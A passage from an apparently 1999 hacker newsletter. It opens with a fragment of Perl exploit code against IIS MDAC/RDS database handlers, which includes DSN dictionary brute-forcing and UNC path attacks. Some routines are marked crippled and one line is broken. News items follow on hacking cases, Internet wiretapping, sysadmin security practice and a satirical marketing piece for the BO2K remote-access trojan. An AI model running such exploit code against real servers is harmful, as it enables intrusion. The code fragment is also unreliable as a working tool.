@results=sendraw(make_header() . make_req(5,$in,"")); my $temp= odbc_error(@results); verbose($temp); return 1 if ($temp=~/Microsoft Access/); return 0;} ############################################################################## sub run_query { my ($in)=@_; my $req; if (defined $args{c}){$req=3;} else {$req=6;} $reqlen=length( make_req($req,$in,"") ) - 28; $reqlenlen=length( "$reqlen" ); $clen= 206 + $reqlenlen + $reqlen; my @results=sendraw(make_header() . make_req($req,$in,"")); return 1 if rdo_success(@results); my $temp= odbc_error(@results); verbose($temp); return 0;} ############################################################################## #crippled ############################################################################## sub hork_idx { print "\nAttempting to dump Index Server tables...\n"; print " NOTE: Sometimes this takes a while, other times it stalls\n\n"; $reqlen=length( make_req(4,"","") ) - 28; $reqlenlen=length( "$reqlen" ); $clen= 206 + $reqlenlen + $reqlen; my @results=sendraw(make_header() . make_req(4,"","")); if (rdo_success(@results)){ my $max=@results; my $c; my %d; for($c=19; $c<$max; $c++){ $results[$c]=~s/\x00//g; $results[$c]=~s/[^a-zA-Z0-9:~ \\\._]{1,40}/\n/g; $results[$c]=~s/[^a-zA-Z0-9:~ \\\._\n]//g; $results[$c]=~/([a-zA-Z]\:\\)([a-zA-Z0-9 _~\\]+)\\/; $d{"$1$2"}="";} foreach $c (keys %d){ print "$c\n"; } } else {print "Index server not installed/query failed\n"; }} ############################################################################## sub dsn_dict { open(IN, "<$args{e}") || die("Can't open external dictionary\n"); while(){ $hold=$_; $hold=~s/[\r\n]//g; $dSn="$hold"; print "."; next if (!is_access("DSN=$dSn")); if(create_table("DSN=$dSn")){ if(run_query("DSN=$dSn")){ print "Success!\n"; save ("dsn=$dSn"); exit; }}} print "\n"; close(IN);} ############################################################################## sub content_start { # this will take in the server headers my (@in)=@_; my $c; for ($c=1;$c<500;$c++) { # assume there's less than 500 headers if($in[$c] =~/^\x0d\x0a/){ if ($in[$c+1]=~/^HTTP\/1.[01] [12]00/) { $c++; } else { return $c+1; }}} return -1;} # it should never get here actually ############################################################################## sub funky { my (@in)=@_; my $error=odbc_error(@in); if($error=~/ADO could not find the specified provider/){ print "\nServer returned an ADO miscofiguration message\nAborting.\n"; exit;} if($error=~/A Handler is required/){ print "\nServer has custom handler filters (they most likely are patched)\n"; exit;} if($error=~/specified Handler has denied Access/){ print "\nADO handlers denied access (they most likely are patched)\n"; exit;} if($error=~/server has denied access/){ print "\nADO handlers denied access (they most likely are patched)\n"; exit;}} ############################################################################## #crippled ############################################################################## sub use_unc { $uncpath=$args{u}; $driverline="driver={Microsoft Access Driver (*.mdb)};dbq="; if(!$uncpath=~/^\\\\[a-zA-Z0-9_.]+\\[-a-zA-Z0-9_]+\\.+/){ print "Your UNC path sucks. You need the following format:\n". "\\server(ip preferable)\share\some-file.mdb\n\n"; exit; } if(create_table($driverline.$uncpath)){ if(run_query($driverline.$uncpath)){ print "Success!\n"; save ("dbq=".$uncpath); exit;}} } ############################################################################## sub get_name { # this was added last minute my $msadc=<.,?]//g; print "Machine name: $results[$base+6]\n";} ############################################################################## # special greets to trambottic, hex_edit, vacuum (technotronic), all #!adm, # #!w00w00 & #rhino9 (that's a lot of people, and they are all very elite and # good friends!), wiretrip, l0pht, nmrc & all of phrack # # thumbs up to packetstorm, hackernews, phrack, securityfocus, ntsecadvice # # I wish I could really name everyone, but I can't. Don't feel slighted if # your not on the list... :) ############################################################################## @HWA 06.0 Online encrypted privacy for email and WWW ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Submitted by: Ed URL: https://ca.privacyx.com/ The PrivacyX website is an anonymous and encrypted web based email system that allows you to send encrypted anonymous email through their pop3 servers, You will have to accept a signed certificate from their site and install it on your system, the site currently only offers 512 bit keys presumeably to keep the international nature of the site open. Once you have edited your config to use the mail.privacyx.com servers you are ready to send and receive email using the service. A test email sent an hr ago still has not arrived as of yet, i'll update when (if) it comes through. @HWA 07.0 More on the Chris Buckley Saga ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Contributed by Abattis From http://www.theregister.co.uk/991119-000003.html Posted 19/11/99 11:56am by Linda Harrison 0800 court case adjourned... Chris Buckley, the teenager accused of using a BT 0800 number to access the Web without permission, yesterday had his case adjourned to December. The 18-year-old had his appearance at Corby Magistrates Court, Northamptonshire, put back to December 3 to enable his solicitor to take instructions. Buckley, from Oundle, Northamptonshire, allegedly used a BT freephone number to access the Net without authorisation or permission. He faces three charges: gaining unauthorised access to the Internet; posting material on newsgroups that may have caused "an annoyance"; and using profanities. ® -=- Posted 18/05/99 11:44am by Tim Richardson Fraud charges follow abuse of BT 0800 test number An anonymous Net user has been accused of fraud and threatened with legal action for using a toll-free number to access the Web that was reserved for use by BT staff. A letter, purportedly sent by BT customer relations manager Keith Lawton, orders the unnamed customer to cough up for the 680 hours and 45 minutes spent online illegally -- or face legal action. The letter also warns the crafty BT customer that if he/she does it again, the police will be called "with a view to criminal charges being brought". Having already issued a warning to stop using the number, Lawton wrote: "By continuing to use that freephone number you have committed fraud against us." "As you have knowingly used our internal ISP without our express authorisation, we are billing you for all the time that you have been online using our freephone number by converting all time spent online to a national number," Lawton wrote. There is no indication exactly how much the bill is for but it could run into many hundreds of pounds. A spokesman for BT said the company would not comment on an individual customer's bill and also questioned the validity of the letter It could be genuine, or it could be a hoax, he said. Since no one is prepared to say one way or the other, The Register has decided to let its readers decide whether it's kosher or not. Check out the letter here: http://www.angelfire.com/ar/bt0800/ -=- Posted 19/05/99 11:44am by Tim Richardson BT fraud letter outed as a fake The letter accusing a BT customer of fraud is bogus, according to a learned reader of The Register. Matthew Garrett, a medical student at Cambridge University said: "The alleged letter from BT is a fake. "Putting it through a colour filter reveals that the BT logo in the top left corner and the bar code and footer have been scanned in and pasted on top of a computer-generated document. "Creases are also clearly visible around the staple region, but oddly enough aren't anywhere else on the page. "And as a final nail in its coffin, the background of the main page is full red, green and blue, a value that is highly unlikely to occur in nature since paper tends to be slightly off-white. "The rest of the page is plain and perfect white, which would only occur in a computer-generated image. "Hence it is fake. "If anyone can produce that with a scanner and a perfectly ordinary sheet of paper, I'd be greatly impressed. "My version of it is here, and I know there's some other enhanced copies floating around," he said. http://www-jcsu.jesus.cam.ac.uk/~mjg59/0800.jpg To see yesterday's story about the alleged fake letter, click here. After his thorough job on this little number it looks like Matthew will have no problems sailing through his post mortem course. ® -=- non related story; Posted 12/11/99 3:41pm by Tim Richardson 22,000 people and the 08004u security lapse It seems the 22,000 or so people who gained totally toll-free access to the Net earlier this week courtesy of Scottish ISP, 08004u, didn't even have to blag their way past password security. That's because there was no security. It simply didn't exist. Any login ID and password would have got them into 08004u's network and onto the Web, The Register has learned. According to some of those who took advantage of the Scottish ISP's generosity, 08004u just left the doors wide open allowing anyone to walk in completely uncontested. "I could dial their 0800 number, and have the login IAMCOOL and password ANYTHING, and it would work," wrote one Net user who asked to remain anonymous. "I find this to be an insult to the people that are paying their £50 a month [for unmetered access]," he said, revealing he was one of 08004u's subscribers. It'll be interesting to know how 08004u is planning to pay for this charity...after all, there's no such thing as a free lunch. ® @HWA 08.0 Security Practices Today, Or Lack Thereof ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Erik A new article in the Buffer Overflow section illustrates what system administrators are doing these days in the way of security. You may be surprised, or not, at what some administrators consider to be secure computing practices. Buffer Overflow http://www.hackernews.com/orig/buffero.html Security practices today. Or lack thereof By: Erik Parker - Bio Mind Security Companies are not giving computer security the attention that it needs. I have interviewed several System Administrators and Security Administrators. What I found was what I had expected, that things just aren't getting done the way they should be. Most companies that have over 100 employees have their own computer operations staff. Unix Administrators, NT Administrators, Novell Administrators, Etc., of course all depending on the individual network. Companies that are computer companies, making software, doing internet business, or depend on every single user using their computer usually have larger network staffs, makes sense right? All too often network security is not a concern on these smaller networks. Even more sad than that, all to often it isn't a concern on larger networks. Networks with thousands of users, and a fulltime staff of administrators, or companies who have permanent in house contractors. "Network Security" is left up to the Administrators. That isn't so bad if your administrators happen to be security specialists. However, most of the time that isn't the case. Companies expect their network to be secure, or just don't expect. Many places don't have policies, or have a plan to someday start one, but don't want to bother until it becomes a problem, after they have been hacked, or an inside info starts leaking out, and the SEC is coming down their throat. We interviewed 7 Unix Administrators, and 3 NT Administrators. We didn't gain any worthwhile knowledge from the NT Administrators, as none of them knew about security or were concerned with it. If I had more time, I could have interviewed some that dealt with their own firewalls and all the network security. So from here on out, I will refer to only Unix Admins. All of the Unix Admins we interviewed were in charge of keeping their machines secure. Some were in charge of their firewall, some weren't. The Most common security practice was simply shutting down services that weren't needed. End of story. Other cases the Admins would keep lists of patch levels, and every couple of months go out and check for new versions of their daemons they were running. Many of them didn't know how to search their machines for SUID binaries, and couldn't understand why it would matter. Several others claimed that they didn't bother to shut down services, because the firewall blocked all incoming connections to those machines except on specific ports, like SMTP and HTTP. When I asked those Admins if they were in control of their entire network, some were, and some weren't. The ones who weren't, claimed to know that there were other points of entry into the network besides the firewall that controls direct access to their specific server cluster. I asked a specific set of questions to each person, I never went on to ask questions to counter their responses. Mainly because if I had, I would have been teaching them security, and putting thoughts into their head. Well, that is why this article is being written. I was surprised to hear a few administrators tell me that they didn't worry about security breaches, because there was nothing on their network that hackers or crackers would care about. I guess I had to chuckle about that. There doesn't have to be top-secret files, some new operating system, or something that is plainly obvious. Most of the hacks and cracks that you hear about, are done for web page changes. That seems to be what is in the media most often. Many hacks go unreported as well, for reasons of the stock market, embarrassment, and several Admins won't even admit to their own boss after finding out about the hack, as they think it will be thought of as their fault. Which, unless they are the security admin, and properly trained in it, it shouldn't be their fault. Companies often hire Security Penetration engineers, or if you will, strike teams, to break into their network, and test security. From outside or inside. Sometimes they don't bother to give these teams user level access, which is very stupid, since regular users could be the very problem. Also quite often a machine will be compromised via a daemon that isn't running as root, and only granting the hacker the daemons user level access, and from that they can gain root access from local exploits, the same local exploits some companies never have the strike teams check for. Some of the Security Administrators I spoke to, gave me a quick run down of what they do to secure a network. Their quick list was to setup a firewall and only allow the access that was needed. I won't go into detail about proper firewall rules and such, I don't want to get that technical here. They also said they would remove utilities that aren't going to be used on the servers. For instance, an ultra 5 with Solaris 7 on it, that has one function, to run Apache and serve web pages all day, and do nothing else. Does it need the capability to print? Does it need Openwindows or CDE installed? No. These Admins would remove packages not needed, and other ones that aren't in use by the system. Others that may be used by the Admins at some point, and are Set UID root, get their sticky bit removed. Users don't need root level access to most of these. On most systems, if you would like to see all of the files on it that are SUID root, issue this command: `find / \( -perm -4000 -o -perm -2000 ! -type d \) -exec ls -ldb {} \; >> output.log` The other things the Admins said they would do, are to keep up to date on all of the patches, and actively keep up with their software. I personally get on the maker of the software's mailing list, development lists, and user list. This makes for a pretty busy procmail, but you will catch things early on. Other things Security Admins do are to secure every machine, and any machine they aren't in control of they don't trust from anywhere on their network. They of course shut off all services not needed, like 98% of what is in /etc/inetd.conf. Any daemon that will run properly chrooted to its own directory gets set that way. Any program that can run as a non-privileged user get set that way. There is more that a dedicated Security Administrator does, but there is just too much to go through. Keep In mind that you should never install software from binary distributions if possible. With source you read the source if you wish, and compile without the extra options you may not need. Often exploits for programs are in features in the software that you didn't really need, but got compiled in by default. Something I am not touching on too much, but intrusion detection can be a good way to go as well. There are many types of software and even hardware that does it. You can monitor your systems for attacks, attempts, or full-blown break-ins. There is a software called "Anti-Sniff", that is just that.. It is a sniffer detector. If one of your machines is compromised, and someone is sniffing your network for passwords, data, or some other information, this will detect it. You can find Anti-sniff at http://www.l0pht.com/antisniff/. We also recommend for networks with more than a couple machines, setting up a dedicated log host. This machine serves ONE function, and one alone, to log. You setup all your remote machines to have their syslog piped off to this machine. It doesn't need to be a huge box, or an expensive box. I have used a 486-100, running Linux on it, and had 35 servers logging to it. Put a 20 gig drive in it, and have it compress logs every so often. Works like a dream. If you use a big server for it, you will often find your management having this "Great Idea" to use it to run other services as well. I personally have been asked before to make our loghost the ssh gateway from the outside, I hope you can see the problems in that yourself. Something else that is difficult for companies to understand and put up with, and many don't, and end up suffering because of it, are the fact that many skilled Administrators spend a lot of time associating them selves with what would be classified by the media and the US government as Black hat hackers. However, they are the very people we are protecting networks against, and they often get information before we do. They are often a great resource for information, and even for tips when you have questions. You have to know both sides to be successful. We aren't hurting them any by securing the networks. There will always be networks out there that aren't secure. It also gives them more of a challenge in life, which is often something they consider fun. I personally don't believe in the labeling of White hats or Black hats, as many people who are considered to be black hats, go to work every day in a suit and tie, get paid 150k a year, and are the best security administrators there are. There isn't a ton like that, but some of them are batting for both teams. What would that make them, gray hats? There is a bigger problem that exists. It is what we call Upper Management. You know, the person who signs your purchase orders, gives you your paycheck, and the same person who never thinks about security. It costs money, and that is bad. They think because they don't see a problem, don't fix. What stupid logic that is. You won't ever see a skilled hacker, as they will come in, get what they want, and disappear and perhaps never run across your network again. I think it is much better to have a cracker hit a site, than a hacker. I'd much rather have a server erased, or a web page changed, than to have a hacker come in, and rip off software, or documents, or project plans that my company has been working on for years, and sell it to competitors, or post them on some stock board, and make my company's stock fall 50%. Upper management doesn't care about that. They either don't understand what security is, or just don't think it could happen to them. The problem is, you will rarely, most likely never look like a hero at your company. If you do get the go ahead to do serious security work, hire an outsider, or hire a fulltime security admin, and they do a good job, you won't get hacked. Life goes on as it was, and it seems like a waste of money. Your boss doesn't lose sleep at night thinking about how insecure your network is, but you might, since it is your fault either way if it gets hacked. If you don't implement security, then you are certainly not shown off as a hero, unless you track him down, file suit, and he happens to be rich, and your company makes a boatload of money. Not likely going to happen, once its reported to the FBI, and they do their research, and maybe even raid someone, its years later, and you have moved on to a new company. You have to think up every single problem on the network, what could happen, and show it to your boss. Make a chart, show problems, and show costs. In most cases the cost of cleanup, and potential loss of money, is far more than hiring a security staff. Some Upper Management understand more clearly if you put it simply, such as "Do you get the oil in your Porsche changed from every three to five months? Even though nothing was wrong?". Most likely they do, or at least know that they SHOULD. That is a fact, that keep up the maintenance schedule, and you have less problems. Well, same way with computers. It is difficult in most companies, very difficult. Even worse if you are working for the government, since every penny has to be cleared, and it takes time. Most of the time you either end up doing it and never getting recognized, or paid. If you don't have the time, well, that would explain why you see so many government cracks listed on web page defacement sites like attrition.org. It is a difficult job, and if you work for a consulting company, you are in luck. It most likely isn't your job to sell the audits, you just do them for the company who was convinced that they needed it. You do have a harder job though, and that is writing up a security policy, and making the company understand they MUST follow it. Many just want their network locked down, and don't are about a policy. If you only care about the money, so be it. If you care about doing the best job you can, getting the security done right, you need to make them understand they have to make your security policy, well, policy. Security today, and in the past, just isn't what it needs to be. Most companies consider it to be a pain, and an expense that isn't needed or justified. Companies need to focus on the area, and big companies need to hire a fulltime security admin, or keep an open account with a contractor for routine security audits, and have their administrators trained on keeping up to date on things. All companies should have someone who monitors mailing lists like Bugtraq, or NT Bugtraq, depending on what platforms you are running. Things need to change, and if you are in a position where you can do that, I suggest you do it right now. If you firmly believe in the future of the Internet, and E-commerce, I also know that if I were the only person buying things on-line, every e-commerce site would shut down, because I just can't afford to keep them all going. I've talked to a couple of people who say they won't buy anything online. They don't think their credit cards are secure, or their personal information. People are scared of it, and they keep hearing about hackers, and all these evil things going on that they don't understand. Many web sites try to comfort people, by explaining the encryption method for the browsers, and leave it at that. For the people who have been living under rocks, and have only heard about credit card stealing, and not about hacking, and computers being compromised, or for the people who just don't understand what that means, they think their data going encrypted is all there is to it. Many people don't realize when hackers get credit card numbers, they get them in bulk usually, rarely from sniffing, but from compromising the machine that holds these plain text files, or databases holding the information. @HWA 09.0 Internet Wiretapping Still a Possibility ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Brian Oblivion While approximately fifty-five percent of the Internet Engineering Task Force voted against a measure to include wiretapping capabilities into new protocols there was not a high enough objection to close the issue permanently. The director of the transport area of the IETF said that unless the proposal receive a much stronger objection the possibility of including these features still exists. ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2392616,00.html?chkpt=zdnnstop -------------------------------------------------------------- This story was printed from ZDNN, located at http://www.zdnet.com/zdnn. -------------------------------------------------------------- Internet wiretapping still a threat By Robert Lemos, ZDNN November 11, 1999 5:24 PM PT URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2392616,00.html A push by law enforcement to make the Internet wiretap-friendly hit a major snag on Wednesday, when members of the Internet Engineering Task Force -- the body responsible for setting Internet standards -- overwhelmingly said 'no' to a key question. The question: Should the IETF put features in forthcoming protocols whose sole purpose is to facilitate wiretapping? Scott Bradner, director of the Transport Area of the IETF -- where the motion was originally proposed -- estimates that 55 percent of the members answered 'no,' another 15 percent said 'yes,' and the rest abstained. Not resolved While that may seem definitive, Bradner stressed that the issue remains open. "The IETF doesn't vote; we work on rough consensus," said Bradner, who stressed that without a large majority -- say, 80 percent -- of its members voting one way, the issue would not be resolved. "After the meeting, we are still in somewhat of an ambiguous area," he said. "There is clearly not strong support for doing it, but there is not strong enough support to definitively block wiretapping from future standards." That leaves the issue tabled for the moment, but certain to be brought up again. "This is just the beginning," said Jim Dempsey, senior staff counsel with the policy think tank Center for Democracy and Technology, who attended the meeting. "The vote was about 10 to 1 against, but that won't stop it." Expanding wire-tapping The whole Internet wiretapping concept is a direct result of the Communications Assistance for Law Enforcement Act of 1994, which requires telecommunications companies to aid law enforcement in legally obtained wiretaps by making their network infrastructure wiretap-friendly. For the past two years, law enforcement officials have been lobbying Congress and putting pressure on cellular phone companies to apply the law to their phone network as well. The Internet is the next communications network on the list. "If it is a one or a zero, or an analog signal, the government is entitled to intercept the signal," said CDT's Dempsey. "But does that mean they can force companies to design their systems to make it easy to get the signals they want, when they want it? That's the CALEA question." Privacy advocates such as the Electronic Privacy Information Center spoke out adamantly against a pro-wiretapping Internet. "... We believe that such a development would harm network security, result in more illegal activities, diminish users' privacy, stifle innovation, and impose significant costs on developers of communications," wrote EPIC in an open letter to the IETF. "At the same time, it is likely that Internet surveillance protocols would provide little or no real benefit for law enforcement." Fear of hacking The IETF answered more out of security concerns than any thoughts about privacy, said Bradner. "If you put in some mechanism where someone with legal authority can tap your telephone, what stops some hacker from doing that?" he asked. The FBI could not be reached for comment on the issue. In any event, the whole debate may be moot. The vote just barred specific development of features solely for wiretapping, but other pieces already present in the Internet could be used to create an effective wiretap. "Some people think that all the functions necessary to do an intercept may already be in the protocol for other reasons," said Bradner. For example, the Internet allows servers to do accounting: Finding out where a packet came from and where it is going. In wiretapping, such a feature is called a pen register and is considered the first step in narrowing down the calls that need to be tapped. CDT's Dempsey believes the vote may be moot for a different reason. "Two thousand engineers get in a ballroom and raise their hands -- that means nothing to the government," he said. "What it DOES mean is that they will have to go to the CEOs ... and make their case." @HWA 10.0 Stock Prices Manipulated in China ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by no0ne Zhao Zhe, 28 and a former trust firm employee, received three years of jail time from a Chinese court and was ordered to pay restitution for breaking into a computerized trading system, and manipulating stock data. This allowed the pair to sell shares at higher prices. CNNNfn http://www.cnnfn.com/1999/11/12/emerging_markets/wires/china_hacker_wg/ Wired http://www.wired.com/news/reuters/0,1349,32512,00.html Nando Times http://www.techserver.com/noframes/story/0,2294,500057111-500094072-500360224-0,00.html CNNNfn Chinese hacker jailed Former trust firm staffer found guilty of hacking into stock system November 12, 1999: 10:24 a.m. ET SHANGHAI (Reuters) - A Chinese court jailed a former trust firm worker for three years Friday for hacking into a computerized stock trading system and manipulating prices, a court official said. The Shanghai court found Zhao Zhe, 28, guilty of rigging stock data so that he could sell shares at inflated prices, he said. Zhao, a former employee of the Shanghai branch of the Shijiazhuang Trust and Investment Co., was also ordered to pay 2.9 million yuan ($355,200) in compensation for trading losses, had illegal income confiscated and was also fined 10,000 yuan. "This is a rare case for China," said the court official. "We don't see hackers breaking into stock trading systems very often." The court found Zhao guilty of breaking into the computer system of the Shanghai branch of a securities company and inflating the prices for Shanghai Xing Ye Real Estate Co. and Henan Lotus Flower Gourmet Powder Co. Prices of the two companies' domestic shares rose their daily limit of 10 percent in unusually heavy trade as a result of the price manipulation, according to the official media. The Shanghai stock exchange has said prices in its computerized system were affected by the false information and it has vowed to take steps to strengthen computer security. -==- Wired; Stock Hacker Jailed in China Reuters 8:00 a.m. 12.Nov.1999 PST SHANGHAI -- A Chinese court jailed a former trust firm worker for three years on Friday for hacking into a computerized stock trading system and manipulating prices, a court official said. The Shanghai court found Zhao Zhe, 28, guilty of rigging stock data so that he could sell shares at inflated prices, the official said. Zhao, a former employee of the Shanghai branch of the Shijiazhuang Trust and Investment Co., was also ordered to pay 2.94 million yuan (US$355,200) in compensation for trading losses, had his illegal income confiscated and was fined an additional 10,000 yuan. "This is a rare case for China," said the court official. "We don't see hackers breaking into stock trading systems very often." The court found Zhao guilty of breaking into the computer system of the Shanghai branch of a Hainan securities company and inflating the prices for Shanghai Xing Ye Real Estate Co. and Henan Lotus Flower Gourmet Powder Co. Prices of the two companies' domestic currency A shares rose their daily limit of 10 percent in unusually heavy trade as a result of the price manipulation, according to the official media. The Shanghai stock exchange has said prices in its computerized system were affected by the false information and it has vowed to take steps to strengthen computer security. Copyright 1999 Reuters Limited. -=- Nando Times; China jails hacker for 3 years Copyright © 1999 Nando Media Copyright © 1999 Agence France-Press From Time to Time: Nando's in-depth look at the 20th century BEIJING (November 14, 1999 8:07 a.m. EST http://www.nandotimes.com) - In the first such case in China, a computer hacker convicted of manipulating prices on the Shanghai Securities Exchange was sentenced to three years in prison, state media said Sunday. Zhao Zhe, a staff member at a securities company, broke into the computer system of the Shanghai Securities Department of the Sanya Zhongya Trust Investment Company and changed five transaction records, the Xinhua news agency said. He caused the turnover of two stocks to rise drastically and brought about a direct loss of 2.95 million yuan (the equivalent of $355,000), Xinhua said. The hacker was also fined 10,000 yuan - the equivalent of $1,200. @HWA 11.0 Rumours: Vent of Level Seven raided by FBI? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This came to light on one of the channels I frequent, its unconfirmed at this point but looks bad for vent if this is true. Keep in mind people say all sorts of stuff on IRC and its not all true, although I see no reason for vent to make something like this up - Ed [12:05] _________________________________________ [12:05] | tnev (vent@ccxxxxxx-a.xxxxxx.xx.home.com) [12:05] | name : beat cancer, over dose [Level Seven] [12:05] | chan : [12:05] | serv : irc.home.com [12:05] | idle : 8hrs 45mins 40secs [12:05] heh, im idle too much [12:05] yea, i got fucking raided [12:05] i gotta go to court [12:06] and shit [12:06] prolly scared straight [12:06] for everything else i did [12:07] ...maybe. [12:07] level seven is surely dead [12:07] fbi knows about us [12:07] and they wanna give us 12 yrs for the usembassy hack [12:07] cause of some 'stolen documents' [12:08] and because of the message we left [12:08] on the site [12:08] 3 days after the actual usembassy bombing @HWA 12.0 Electronic Information Stolen from Egypt ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench With all the hype about electronic break ins, cyber-intruders, and internet terrorists it is sometimes easy to forget about the physical world. On October 6th of this year Egypt discovered several computer disks had been stolen from the University of Cairo. The disks contained classified information about the country's natural resources such as gold, copper and uranium reserves. Nando Times http://www.nandotimes.com/technology/story/body/0,1634,500057186-500094173-500360964-0,00.html Secrets about Egypt's natural resources stolen Copyright © 1999 Nando Media Copyright © 1999 Agence France-Press For more about Africa, visit Africa News Online. CAIRO (November 14, 1999 12:10 p.m. EST http://www.nandotimes.com) - Egyptian police are investigating the Oct. 6 theft from Cairo University of dozens of computer disks containing classified information about the African nation's natural resources, university security officials disclosed Sunday. University employees, including members of the geography department, are being questioned about the theft, which took place more than a month ago, but the officials said the investigation had not yet yielded any results. The disks contain information on the location of oil, gas and uranium fields as well as gold and copper deposits and other classified geographical information, university sources said. The pro-government Al-Ahram newspaper reported that the disks also contained the results of all Egyptian geographical studies carried out over the past two centuries. It was not clear if the disks contained the only copies of the information or why the Oct. 6 crime has not been publicized before now. In early 1998, Egypt had oil and gas reserves of 1,090 million oil equivalent tons, according to oil ministry sources. No figures were available for gold and uranium reserves. @HWA 13.0 Aleph One Gives NPR Interview ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by oolong Aleph One (Elias Levy), the administrator of the BugTraq mailing list and the CTO of Security Focus.com, was interviewed on National Public Radio on the topic of "Cyber Terrorism" last Friday. NPR - archived .ram file of the interview http://www.npr.org/ramfiles/me/19991112.me.10.ram @HWA 14.0 South American Con Announced ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Space Rogue Whoa, a hacker convention in Bogota, Colombia. Its coming up very soon. Check out Col Con '00. HNN Cons Page http://www.hackernews.com/cons/cons.html @HWA 15.0 c ~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Space Rogue Issue one of Camarilla, a new zine with articles on computers, networking, telephony, humor and everything in between has been released. Camarilla http://camarilla.hektik.org @HWA 16.0 BO2K Marketing Plan (Very funny reading, check this out) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Dildog What if Back Orifice 2000 was a commercial product? It would need a marketing plan. Just how would you market BO2K to the masses? Adam Penenberg had 5 top PR firms design a marketing campaign for BO2K, and some of the ideas are pretty wacky. Forbes http://www.forbes.com/columnists/penenberg/ They sure don't make press agents like James Sterling Moran anymore. The undisputed Master of the Publicity Stunt, Moran, who at 91 recently passed on to that great File-O-Fax in the sky, reeled off a number of Lucy Ricardo-like schemes to sop up media attention in his lifetime. According to his obituary, he once walked a bull through a china shop, sat on an ostrich egg for 19 days until it hatched and looked for a needle in a haystack. But Moran's most inspired plan never got off the ground: Flying a midget over Central Park on a kite. The cops put the kibosh on that, prompting Moran to quip "It's a sad day for American capitalism when a man can't fly a midget on a kite over Central Park." Some publicists believe stunts like Moran's have gone the way of castor oil, manual typewriters, prohibition and vaudeville, but I think they would go over well today. (Look at Dennis Rodman or John Wayne Bobbit.) With the emergence of the Internet there are now thousands of content-starved media outlets hovering in cyberspace. With this in mind I decided to ask five top PR firms to design a Moran-like marketing campaign for a decidedly spooky product: Back Orifice 2000 ("BO2K" for short, a not so subtle dig at Microsoft's "Back Office"), a software created by the hacker group Cult of the Dead Cow. BO2K has many intriguing functions. It can be covertly installed on a victim's hard drive, then used to control the computer from a remote location. That way the nefarious hacker could access your E-mail, pull up your surfing history, rifle through your personal files, trash your system. But wait! There's more! BO2K also serves as a nifty surveillance tool; it can automatically turn on microphones and cameras on victims' computers so you can watch your coworkers without their knowledge. Another popular remote-access hacker tool called Netbus recently became commercially available, so I decided to price BO2K competitively: $15, the same as Netbus. Here's what the PR tsars and tsarinas came up with: Worry warts A huge revenue upside opportunity could be realized if the Cult of the Dead Cow were to focus on potentially the most lucrative market for its product: the paranoid corporate executive. As most technology products are targeted to specific market categories (with resultant product feature-set tailoring), following is a recommendation for marketing and promotion for this segment: Product Name: "CEO's Big Brother" Product Pricing: $15 per employee, plus free tech-support (from a trusted third-party vendor). Feature set: Basic BO2K with spy attachments. Market: Allows the busy, perpetually paranoid executive the ability to check on staff on a 24/7 multimedia basis (with remote spy attachments for audio/video). Works equally well with potentially back-stabbing board members and pesky competitors. Strategy/Implementation: Reach audience with multisite live product launch. Campaign specifics: Live demonstrations at all airport shuttle terminals (Boston, NY, DC, LA, Orange County, SF) with free 30-day trial disks handed out. Create partnership campaign with large hotel chain (e.g., Hyatt). Product kit with same trial disks handed to all executive business travelers. Commission survey with results that will demonstrate the need for remote monitoring to reinforce product category viability (e.g., "52% of American workers cite their No. 1 use of the Internet at work as a means of looking for another job, while only 10% use computers to increase their productivity..."). Include survey in media kit. Endorsements: Reach out to high-profile CEOs like Gil Amelio, Mike Ovitz, Ross Perot, for "if only I'd had this product" testimonials. Market beta testers' experience as "management success" stories to key business media publications, pre-launch (timing to hit week of launch). Post-launch: Have Cult member coauthor book with Donald Trump, tentatively entitled "Art of the Steal," a blueprint for getting competitive data (BO2K) and what do with it once you've gotten it. Resultant 15-city book tour and TV campaign. --Michelle Zawrotny, Phase Two Strategies, San Francisco Go viral Our plan would appeal to the driving factors that, in some combination, motivate all hackers--the prospect of fame, conquering a challenge, dissing the establishment and earning the respect of their peers. To appropriately brand and market BO2K to a retail audience we would employ a viral marketing campaign (naturally!) to promote and, indeed, exploit various hacker feats. Under the slogan of "Got Code?" the Cult of the Dead Cow could sponsor a hacker contest to illustrate the uses of Back Orifice most effectively. The best hackers would be eligible for various prizes, including hacker lifestyle gear (extra-padded chairs, official "Star Trek" paraphernalia), dinner and a movie with Linus Torvalds (the undisputed king of open source technologies), and the grand prize: A live cow presented to the lucky winner at Defcon, the annual hacker convention held in Las Vegas, by the entire Cult of the Dead Cow, dressed in billowing monks robes with hoods. The publicity for the contest itself would be equally viral: The Cult could hack into web sites (with permission so they don't violate the law, although the public doesn't need to know that) to post its marketing message. -- Jesse Ciccone and Todd Evans of FitzGerald Communications Inc., San Francisco office "You've got BO!" Here's a PR recipe for BO2K to get on the straight and narrow: Seize the controversy, play the contrarian, tout a celebrity spokesperson and engage in some reverse engineering. Timing is crucial. Start the campaign in late December. With Y2K only days away, concerns about cyber-terrorism and accidental missile launches will be at a fever pitch. Members of The Cult of the Dead Cow will rush to the Nation's Capital, wearing white hats. Speaking from an outdoor press conference in a muddy Silicon Swamp, i.e. Washington Mall, they will address officials from the government and private industry and offer to serve as exclusive security consultants to the American government. We'll be sure to spike the audience with business celebrities, lawyers from the Department of Justice's antitrust case against Microsoft and politicians who want to "hip up" their image. In addition, hacker groupies will be paid to sit Indian-style across the Capital police barricades and conduct a computer security vigil. To erect the long-term campaign, Pamela Anderson Lee, wearing a G-string, will be signed to appear in a rock-video music stream composed and performed by her mercurial mate, 